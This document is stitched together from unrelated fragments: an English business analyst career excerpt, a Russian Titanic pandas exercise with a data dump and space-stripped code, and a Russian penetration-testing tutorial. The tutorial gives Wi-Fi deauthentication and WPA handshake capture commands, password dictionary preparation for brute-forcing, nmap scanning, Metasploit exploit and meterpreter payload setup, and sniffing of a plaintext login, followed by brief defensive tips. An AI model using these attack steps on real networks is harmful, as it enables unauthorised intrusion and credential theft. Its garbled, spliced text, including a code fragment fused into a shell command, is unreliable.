«A business analyst is any person who performs business analysis tasks described in the BABOK® Guide, no matter their job title or organizational role. Business analysts are responsible for discovering, synthesizing, and analyzing information from a variety of sources within an enterprise, including tools, processes, documentation, and stakeholders. The business analyst is responsible for eliciting the actual needs of stakeholders — which frequently involves investigating and clarifying their expressed desires — in order to determine underlying issues and causes». (BABOK® Guide), http://www.iiba.org/Careers.aspx
Title vs. Role
Business analysis professionals work in a wide range of industries and support a variety of functional areas although their job titles can vary widely. Whether you are a systems analyst, requirements manager, product manager, or consultant, your title reflects your position as defined by your particular company. A role reflects the discipline you practice and your professional association — business analysis.
Are you already a business analyst and want to advance to a more senior position?
The IIBA® Business Analyst Career Road Map outlines the business analysis opportunities available to you. The Career Road Map is designed to identify the many roles within business analysis, and show your options based on your experience today. It includes the emerging roles in business architecture and business intelligence which are in high demand.
Role Descriptions
The role names are not job titles – a role name represents the various tasks, techniques and knowledge needed by an individual to be successful. The roles could be combined into one position: a business requirements analyst could also have deep expertise in process and therefore the business requirements analyst and process analyst roles can be considered as a career path.
Another example: a Systems Analyst may be part of a software development project that utilizes the Agile method. Therefore the Systems Analyst has Agile expertise; he/she could hold an Intermediate Systems Analyst and Intermediate Agile Analyst role but his/her title could be Intermediate Systems Analyst.
Review the Role Descriptions to find out the responsibilities involved and the skills and knowledge needed, to help you map your career.
Сейчас Python является одним из наиболее распространенных языков программирования. Одним из его преимуществ является большое количество пакетов, решающих самые разные задачи. В нашем курсе мы рекомендуем использовать библиотеки Pandas, NumPy и SciPy, которые существенно упрощают чтение, хранение и обработку данных. В дальнейших работах вы также познакомитесь с пакетом Scikit-Learn, в котором реализованы многие алгоритмы машинного обучения.
Какое количество мужчин и женщин ехало на корабле? В качестве ответа приведите два числа через пробел.
Какой части пассажиров удалось выжить? Посчитайте долю выживших пассажиров. Ответ приведите в процентах (число в интервале от 0 до 100, знак процента не нужен), округлив до двух знаков.
Какую долю пассажиры первого класса составляли среди всех пассажиров? Ответ приведите в процентах (число в интервале от 0 до 100, знак процента не нужен), округлив до двух знаков.
Какого возраста были пассажиры? Посчитайте среднее и медиану возраста пассажиров. В качестве ответа приведите два числа через пробел.
Коррелируют ли число братьев/сестер/супругов с числом родителей/детей? Посчитайте корреляцию Пирсона между признаками SibSp и Parch.
PassengerId Survived Pclass \
0 1 0 3
1 2 1 1
2 3 1 3
3 4 1 1
4 5 0 3
5 6 0 3
6 7 0 1
7 8 0 3
8 9 1 3
9 10 1 2
10 11 1 3
11 12 1 1
12 13 0 3
13 14 0 3
14 15 0 3
15 16 1 2
16 17 0 3
17 18 1 2
18 19 0 3
19 20 1 3
20 21 0 2
21 22 1 2
22 23 1 3
23 24 1 1
24 25 0 3
25 26 1 3
26 27 0 3
27 28 0 1
28 29 1 3
29 30 0 3
.. ... ... ...
861 862 0 2
862 863 1 1
863 864 0 3
864 865 0 2
865 866 1 2
866 867 1 2
867 868 0 1
868 869 0 3
869 870 1 3
870 871 0 3
871 872 1 1
872 873 0 1
873 874 0 3
874 875 1 2
875 876 1 3
876 877 0 3
877 878 0 3
878 879 0 3
879 880 1 1
880 881 1 2
881 882 0 3
882 883 0 3
883 884 0 2
884 885 0 3
885 886 0 3
886 887 0 2
887 888 1 1
888 889 0 3
889 890 1 1
890 891 0 3
Name Sex Age SibSp \
0 Braund, Mr. Owen Harris male 22.0 1
1 Cumings, Mrs. John Bradley (Florence Briggs Th... female 38.0 1
2 Heikkinen, Miss. Laina female 26.0 0
3 Futrelle, Mrs. Jacques Heath (Lily May Peel) female 35.0 1
4 Allen, Mr. William Henry male 35.0 0
5 Moran, Mr. James male NaN 0
6 McCarthy, Mr. Timothy J male 54.0 0
7 Palsson, Master. Gosta Leonard male 2.0 3
8 Johnson, Mrs. Oscar W (Elisabeth Vilhelmina Berg) female 27.0 0
9 Nasser, Mrs. Nicholas (Adele Achem) female 14.0 1
10 Sandstrom, Miss. Marguerite Rut female 4.0 1
11 Bonnell, Miss. Elizabeth female 58.0 0
12 Saundercock, Mr. William Henry male 20.0 0
13 Andersson, Mr. Anders Johan male 39.0 1
14 Vestrom, Miss. Hulda Amanda Adolfina female 14.0 0
15 Hewlett, Mrs. (Mary D Kingcome) female 55.0 0
16 Rice, Master. Eugene male 2.0 4
17 Williams, Mr. Charles Eugene male NaN 0
18 Vander Planke, Mrs. Julius (Emelia Maria Vande... female 31.0 1
19 Masselmani, Mrs. Fatima female NaN 0
20 Fynney, Mr. Joseph J male 35.0 0
21 Beesley, Mr. Lawrence male 34.0 0
22 McGowan, Miss. Anna "Annie" female 15.0 0
23 Sloper, Mr. William Thompson male 28.0 0
24 Palsson, Miss. Torborg Danira female 8.0 3
25 Asplund, Mrs. Carl Oscar (Selma Augusta Emilia... female 38.0 1
26 Emir, Mr. Farred Chehab male NaN 0
27 Fortune, Mr. Charles Alexander male 19.0 3
28 O'Dwyer, Miss. Ellen "Nellie" female NaN 0
29 Todoroff, Mr. Lalio male NaN 0
.. ... ... ... ...
861 Giles, Mr. Frederick Edward male 21.0 1
862 Swift, Mrs. Frederick Joel (Margaret Welles Ba... female 48.0 0
863 Sage, Miss. Dorothy Edith "Dolly" female NaN 8
864 Gill, Mr. John William male 24.0 0
865 Bystrom, Mrs. (Karolina) female 42.0 0
866 Duran y More, Miss. Asuncion female 27.0 1
867 Roebling, Mr. Washington Augustus II male 31.0 0
868 van Melkebeke, Mr. Philemon male NaN 0
869 Johnson, Master. Harold Theodor male 4.0 1
870 Balkic, Mr. Cerin male 26.0 0
871 Beckwith, Mrs. Richard Leonard (Sallie Monypeny) female 47.0 1
872 Carlsson, Mr. Frans Olof male 33.0 0
873 Vander Cruyssen, Mr. Victor male 47.0 0
874 Abelson, Mrs. Samuel (Hannah Wizosky) female 28.0 1
875 Najib, Miss. Adele Kiamie "Jane" female 15.0 0
876 Gustafsson, Mr. Alfred Ossian male 20.0 0
877 Petroff, Mr. Nedelio male 19.0 0
878 Laleff, Mr. Kristo male NaN 0
879 Potter, Mrs. Thomas Jr (Lily Alexenia Wilson) female 56.0 0
880 Shelley, Mrs. William (Imanita Parrish Hall) female 25.0 0
881 Markun, Mr. Johann male 33.0 0
882 Dahlberg, Miss. Gerda Ulrika female 22.0 0
883 Banfield, Mr. Frederick James male 28.0 0
884 Sutehall, Mr. Henry Jr male 25.0 0
885 Rice, Mrs. William (Margaret Norton) female 39.0 0
886 Montvila, Rev. Juozas male 27.0 0
887 Graham, Miss. Margaret Edith female 19.0 0
888 Johnston, Miss. Catherine Helen "Carrie" female NaN 1
889 Behr, Mr. Karl Howell male 26.0 0
890 Dooley, Mr. Patrick male 32.0 0
Parch Ticket Fare Cabin Embarked
0 0 A/5 21171 7.2500 NaN S
1 0 PC 17599 71.2833 C85 C
2 0 STON/O2. 3101282 7.9250 NaN S
3 0 113803 53.1000 C123 S
4 0 373450 8.0500 NaN S
5 0 330877 8.4583 NaN Q
6 0 17463 51.8625 E46 S
7 1 349909 21.0750 NaN S
8 2 347742 11.1333 NaN S
9 0 237736 30.0708 NaN C
10 1 PP 9549 16.7000 G6 S
11 0 113783 26.5500 C103 S
12 0 A/5. 2151 8.0500 NaN S
13 5 347082 31.2750 NaN S
14 0 350406 7.8542 NaN S
15 0 248706 16.0000 NaN S
16 1 382652 29.1250 NaN Q
17 0 244373 13.0000 NaN S
18 0 345763 18.0000 NaN S
19 0 2649 7.2250 NaN C
20 0 239865 26.0000 NaN S
21 0 248698 13.0000 D56 S
22 0 330923 8.0292 NaN Q
23 0 113788 35.5000 A6 S
24 1 349909 21.0750 NaN S
25 5 347077 31.3875 NaN S
26 0 2631 7.2250 NaN C
27 2 19950 263.0000 C23 C25 C27 S
28 0 330959 7.8792 NaN Q
29 0 349216 7.8958 NaN S
.. ... ... ... ... ...
861 0 28134 11.5000 NaN S
862 0 17466 25.9292 D17 S
863 2 CA. 2343 69.5500 NaN S
864 0 233866 13.0000 NaN S
865 0 236852 13.0000 NaN S
866 0 SC/PARIS 2149 13.8583 NaN C
867 0 PC 17590 50.4958 A24 S
868 0 345777 9.5000 NaN S
869 1 347742 11.1333 NaN S
870 0 349248 7.8958 NaN S
871 1 11751 52.5542 D35 S
872 0 695 5.0000 B51 B53 B55 S
873 0 345765 9.0000 NaN S
874 0 P/PP 3381 24.0000 NaN C
875 0 2667 7.2250 NaN C
876 0 7534 9.8458 NaN S
877 0 349212 7.8958 NaN S
878 0 349217 7.8958 NaN S
879 1 11767 83.1583 C50 C
880 1 230433 26.0000 NaN S
881 0 349257 7.8958 NaN S
882 0 7552 10.5167 NaN S
883 0 C.A./SOTON 34068 10.5000 NaN S
884 0 SOTON/OQ 392076 7.0500 NaN S
885 5 382652 29.1250 NaN Q
886 0 211536 13.0000 NaN S
887 0 112053 30.0000 B42 S
888 2 W./C. 6607 23.4500 NaN S
889 0 111369 30.0000 C148 C
890 0 370376 7.7500 NaN Q
[891 rows x 12 columns]
class1=0class2=0class3=0class4=0sum=0doly=0forindex,rowindata.iterrows():row[2]=str(row[2])ifrow[2]=="1":class1=class1+1ifrow[2]=="2":class2=class2+1ifrow[2]=="3":class3=class3+1ifrow[2]=="4":class4=class4+1sum=class1+class2+class3+class4doly=round(class1*(100/sum),2)print(doly)#доля первого класса
24.24
In [189]:
survived=0notsurvived=0importmatplotlib.pyplotaspltfrommatplotlib.linesimportLine2Dimportpandasdata=pandas.read_csv('C:\\Users\\Andrey\\Desktop\\titanic.csv')forindex,rowindata.iterrows():plt.plot(row[5],row[6],'ro')row[1]=str(row[1])ifrow[1]=="1":survived=survived+1else:notsurvived=notsurvived+1plt.grid(True)plt.xlabel(u'Возраст')plt.ylabel(u'Шлюпка')plt.title(u'Рассадка пассажиров по шлюпкам')plt.show()sum=survived+notsurvivedpercent1=((survived*100)/sum)percent2=100-percent1print("Выжило = ",percent1,"%","Кол-во",survived)print("Не выжило = ",percent2,"%","Кол-во",notsurvived)
Нам необходимо построить классификатор Decision Trees
.
In [2]:
importnumpyasnpimportpandasaspd
In [6]:
fromnumpyimport*fromsklearn.treeimportDecisionTreeClassifierdata=pd.read_csv('C:\\tias\\titanic_1\\titanic.csv',index_col='PassengerId')main_data_frame=pd.DataFrame(data=data,columns=['Pclass','Fare','Age','Sex','Survived'])main_data_frame=main_data_frame[["Pclass","Fare","Age","Sex","Survived"]].dropna()#очищаем от Nano(в)output=main_data_frame[["Pclass","Fare","Age","Sex"]].replace("female",0).replace("male",1)clf=DecisionTreeClassifier(random_state=241)Y=main_data_frame['Survived']X=outputprint(X.columns)clf.fit(X,Y)print(clf.feature_importances_)
Под информационной безопасностью понимают защиту интересов субъектов информационных отношений. Основными составляющими информационной безопасности является конфиденциальность, целостность, доступность.
По большой части в университетах учат методологию обеспечения информационной безопасности, организационное-правовое обеспечение, техническое и методическое обеспечение ИБ, криптографические методы и средства обеспечения ИБ, методы шифрования. Но отчасти теорический опыт не коррелирует с владением определенных программ, операционных систем, с помощью которых можно произвести диагностику, произвести поиск уязвимостей, перехватить трафик.
Для наших практических примеров мы будем использовать: виртуальное окружение, операционную систему и специальные программы.
ВСЕ НАШИ ДЕЙСТВИЯ БУДУТ ПРОХОДИТЬ В УЧЕБНЫХ ЦЕЛЯХ!
1)Виртуальное окружение для нашей операционной системы.
Virtualbox (Одно из мощных средств, которое можно использовать в домашних условиях, скачать можно тут https://www.virtualbox.org/ )
Ubuntu (и устанавливать на нее специальное программное обеспечение,последняя стабильная в Ubuntu 14.04.5 LTS с поддержкой до 2019 года, скачать Ubuntu можно на официальном сайте http://ubuntu.ru/get)
или Kali linux — для продвинутых специалистов по информационной безопасности (последняя версия — 2017.1, скачать ее можно на официальном сайте https://www.kali.org/downloads/);
(Поскольку Ubuntu и Kali Linux основан на Debian, то написанные команды будут работать в обоих ОС).
3) Специальное программное обеспечение.
Nmap — для анализа открытых портов TCP;
Wareshark — для анализа сетевого трафика (сниффер).
Можно использовать средства виртуальной разработки, такие как Vagrant или Docker (но у них не получится создать физическое WLAN устройство и поэтому не получится переключить его в режим монитора).
vagrant init Sliim/kali-linux-2.0-amd64
vagrant up
# Конфигурационный файл vagrant
Vagrant.configure(«2») do |config|
config.vm.box = «Sliim/kali-linux-2.0-amd64»
end
#переходим в суперпользователя
sudo -s
# устанавливаем nmap
apt-get install nmap
# устанавливаем wareshark
(компилируем из исходников)
wget https://1.na.dl.wireshark.org/src/wireshark-2.2.5.tar.bz2
tar -zxvf wireshark-2.2.5.tar.bz2
cd wireshark-2.2.5
make
make install clear
(или добавляем репозиторий и устанавливаем)
sudo add-apt-repository ppa:wireshark-dev/stable
apt-get updatehile (<условие>) {
<тело цикла>
}
Смотрим доступные сетевые адаптеры.
sudo airmon-ng start wlan0
# Поднять и проверить интерфейсы мы можем командой.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0 # Покажет если wlan0 в режиме монитора сейчас
airodump-ng wlan0 # Показываем все доступные WLAN
# Запускаем мониторинг канала, для этого создадим папку и будем записывать туда всю передачу трафика по беспроводному каналу 802.11
mkdir snif
airodump-ng -w ‘~/snif/’ mon0
После перехвата hanshake, мы модем открыть файл *.cap в программе wireshark.
Если вы не хотите ждать пока airodump-ng перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа. После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.
# Отправить широковещательное deauth сообщение
aireplay-ng —deauth 100 -a 00:11:22:33:44:55 mon0 —ignore-negative-one
# Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента)
aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 —ignore-negative-on
Если вы не можете получить hanshake после захвата, то вы можете использовать деатификацию беспроводного клиента
aireplay-ng -0 1 -a 00:1C:10:AF:FA:4D -c 68:A3:C4:34:FC:6F mon0
-0 Сообщает aireplay-ng, чтобы перейти в режим деавтоматической атаки
1 Деантификация только одного клиента
-a BSSID цели
-c МАС адрес клиента
mon0 Интерфейс монитора
После того, как вы получили the WPA handshake, остановите захват. И начните перебирать ключи с помощь словаря.
Атака по словарю значительно ускоряет и в целом повышает шансы успешности взлома пароля методом перебора. Не может быть одного самого лучшего словаря – под разные ситуации требуются разные словари.
Словарь от создателей rockyou является универсальным словарём, хорошо подходящим, например, для атаки на пароль Wi-Fi или веб-службы. В Kali Linux данный пароль размещён в (сжатом) файле /usr/share/wordlists/rockyou.txt.gz
Словарь rockyou нужно оптимизировать и очищать для использования под конкретные нужды. Например, если мы знаем, что длина пароля в веб службе составляет от 8 до 30 символов и что обязательно должны использоваться символы как минимум из двух групп (большие буквы, маленькие буквы, цифры, знаки), то очистка rockyou с помощью PW-Inspector будет выглядеть так:
Оптимизация для взлома Wi-Fi будет выглядеть следующим образом. Считываем в стандартный вывод пароли из файла rockyou.txt (cat rockyou.txt), сортируем их (sort), и удаляем повторяющиеся (uniq), из оставшихся паролей выбираем те, которые 8 или более символов, но менее 63 символов (-m 8 -M 63), полученный список сохраняем в файл newrockyou.txt (> newrockyou.txt):
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
Программа BruteX поставляется с подборкой словарей для брут-форса удалённого входа в различные службы и веб-приложения. Посмотреть доступные словари можно здесь: https://github.com/1N3/BruteX/tree/master/wordlists
Словари DirBuster. DirBuster — это многопотоковое Java приложение, предназначенное для брутфорса имён директорий и файлов веб-приложений и веб-серверов. DirBuster пытается найти скрытые каталоги и файлы.
Описание словарей, поставляемых с программой DirBuster
directory-list-2.3-small.txt — (87650 слов) — Директории/файлы которые были найдены как минимум на трёх разных хостах
directory-list-2.3-medium.txt — (220546 слов) — Директории/файлы которые были найдены как минимум на двух разных хостах
directory-list-2.3-big.txt — (1273819 слов) — Все директории/файлы которые были найдены
directory-list-lowercase-2.3-small.txt — (81629 слов) — Версия не чувствительная к регистру для directory-list-2.3-small.txt
directory-list-lowercase-2.3-medium.txt — (207629 слов) — Версия не чувствительная к регистру для directory-list-2.3-medium.txt
directory-list-lowercase-2.3-big.txt — (1185240 слов) — Версия не чувствительная к регистру для directory-list-2.3-big.txt
directory-list-1.0.txt — (141694 слов) — Оригинальный список без изменения порядка
apache-user-enum-1.0.txt — (8916 имён пользователей) — Используется для предположения имён пользователей apache на котором включён модуль userdir, основывается на набранных именах пользователей (неупорядоченный)
apache-user-enum-2.0.txt — (10341 имён пользователей) — Используется для предположения имён пользователей apache на котором включён модуль userdir, основывается на ~XXXXX найденном во время генерации списка (упорядоченный
Пример хакинга wpa/wpa2 без использования словаря
Списки слов от Metasploit. В основном эти словари предназначены для брут-форса удалённого входа в различные службы, имеются неплохие универсальные словари с именами пользователей и паролями (Словари для перебора баз данных (таблиц, полей и прочего)).
………..
├── tftp.txt
├── tomcat_mgr_default_pass.txt
├── tomcat_mgr_default_userpass.txt
├── tomcat_mgr_default_users.txt
├── unix_passwords.txt
├── unix_users.txt
├── vnc_passwords.txt
………………..
C sqlmap поставляются заточенные для баз данных словари, они размещены по пути /usr/share/sqlmap/txt/ Словари Ncrack. Программа Ncrack имеет качественные списки слов для брутформа удалённых служб. Словари располагаются в директории /usr/share/ncrack/ и разделены на имена пользователей и пароли.
Списки слов Nmap Nmap поставляется с несколькими списками, среди которых имеется словарь с паролями. На Kali Linux все они размещены в папке /usr/share/nmap/nselib/data/. Словари Wfuzz. Wfuzz – это ещё один бурт-форсер веб-приложений. В папке /usr/share/wfuzz/wordlist/ можно найти разные подборки, в том числе слова, которые могут быть именами или паролями.
Полный список инструментов для тестирования на проникновение можно найти на сайте https://kali.tools/all/
Анализируем открытые порты устройств.
Nmap («Network Mapper») — это утилита с открытым исходным кодом для исследования сети и проверки безопасности. Многие системные администраторы и администраторы сетей также находят её полезной для таких задач как инвентаризация сети, управления расписанием служб обновлений и мониторинга аптайма хостов или служб. Nmap использует сырые IP пакеты новаторским способом, чтобы определить, какие хосты доступны в сети, какие службы (имя и версия приложений) эти хосты предлагают, какие операционные системы (и версии ОС) там запущены, какие типы фильтров пакетов/файерволов используются и дюжины других характеристик.
Сканируем айпи адреса в подсети (192.168.1). Используем 24 битную маску.
nmap -sn 192.168.1.1/24
Сканируем нужный нам айпи адрес устройства. В данном случае. Был выбрал 44 айпишник, на адресе которого установлен Windows 10 и открыт firewall.
Используем порт 445, на котором находится сервис microsoft-ds. SMB (Server Message Block) – сетевой протокол для удаленного доступа к файлам и принтерам. Именно он используется при подключении ресурсов через \servername\sharename. Протокол изначально работал поверх NetBIOS, используя порты UDP 137, 138 и TCP 137, 139. С выходом Windows 2000 стал работать напрямую, используя порт TCP 445. SMB используется также для входа в домен Active Directory и работы в нем. Статья про отключение SMBv1 есть на https://habrahabr.ru/company/pc-administrator/blog/331906/
Устанавливаем set RHOST = значение айпи адреса.
Show payloads покажет нам все payload’ы, которые совместимы с выбранным нами сплоитом. Для нашего случая мы используем запасной tcp meterpreter, задав его командой set PAYLOAD windows/meterpreter/reserve_tcp, что запустит командную оболочку на удаленном сервере, если к нему будет успешно получен доступ. Сейчас нам нужно снова запустить команду show options для того, чтобы убедиться в том, что все обязательные для заполнения поля имеют соответствующие значения. Только в этом случае эксплоит успешно запустится.
К сожалению, на Windows 10 эксплойты (ms08_067_netapi) не работают. Эксплойт ms08_067_ NetApi работает с операционной системой windows xp, 2003 и тд. Так что — продолжаем поиски подходящего эксплойта!
Если говорить о защите последней OS Windows 10.
Microsoft известна своим внимательным подходом к функциям защиты от эксплойтов, которые интегрированы в Windows. Там последовательно появлялись DEP, SEHOP, ASLR, IE11-EPM, IE11-64bit_tabs, HEASLR. Бесплатный инструмент EMET позволял принудительно включать такие настройки для процессов. В то же время, только с Windows 10 Microsoft стала предпринимать указанные выше шаги по закрытию уязвимых мест, которые используются LPE-эксплойтами.
Новый веб-браузер Edge в Windows 10, в котором Microsoft отказалась от всех устаревших технологий типа COM или ActiveX, которые использовались для внедрения своего кода в веб-браузер вредоносными программами (то же постигнет и Flash Player). Она также закрыла другие возможные места внедрения (инжекции) вредоносного кода в run-time запущенный процесс, а также использует AppContainer и 64-битные вкладки по умолчанию. Использование функции Win32k syscalls filtering сделает этот веб-браузер еще более безопасным.
Перехват трафика с помощью Wireshark
В то время, пока Wireshark прослушивает сетевой трафик и захватывает его. Я открыл браузер и залогинился на веб-сайте, используя имя пользователя и пароль. Когда процесс авторизации был завершён и я вошёл на сайт, я вернулся и остановил захват в Wireshark. Вообще, фильтрацию трафика можно делать и не останавливая захват. После запуска, например, можно установить фильтрацию и просматривать только захват, удовлетворяющий определённым требованиям.
Обычно в Wireshark множество данных. Но нас интересуют только данные, отправленные методом POST.
Видите я выделил строчку log=Dimon&pwd=justfortest?
Т.е. log=Dimon (имя пользователя: Dimon), pwd=justfortest (пароль: justfortest)
Как защититься от брутфорсинга, перехвата и прочего?
1. Не позволяйте посторонним лицам иметь доступ в вашу сеть. Например, не нужно свой Wi-Fi делать публичным, не нужно сообщать пароль от него посторонним лицам. Желательно использовать WPA2 шифрование.
2. Когда вы сами пользуетесь публичными точками доступа, то, хотя бы, помните об угрозе перехвата пароля. Даже если вы не производили вход (не вводили логин и пароль), то ваш браузер постоянно обменивается с сайтами, на которых вы авторизованы, данными кукиз. Это не тоже самое что пароль, иногда кукиз просто бесполезны.
Это не значит что нужно прекратить пользоваться публичными точками доступа. Но поменяв пароль, когда вернётесь к «безопасной» сети, вы сделаете бессмысленным захват тех данных, который мог произойти пока вы пользовались публичной сетью.
3. Используйте VPN, эта технология способна решить все проблемы с небезопасными сетями разом.
4. Самый действенный способ — SSL-сертификаты. У меня по этому поводу две новости: плохая и хорошая. Начну с плохой: от нас, от пользователей сайтов, не зависит, установлен ли на веб-сайте SSL-сертификат, если сертификат не установлен, то мы никак не можем это исправить. Хорошая новость: почти все популярные веб сайты (разные твитеры, вконтакте, фейсбуки, гугл-почты, яндекс-почты и т. д.) имеют эти сертификаты. Даже у Википедии теперь есть!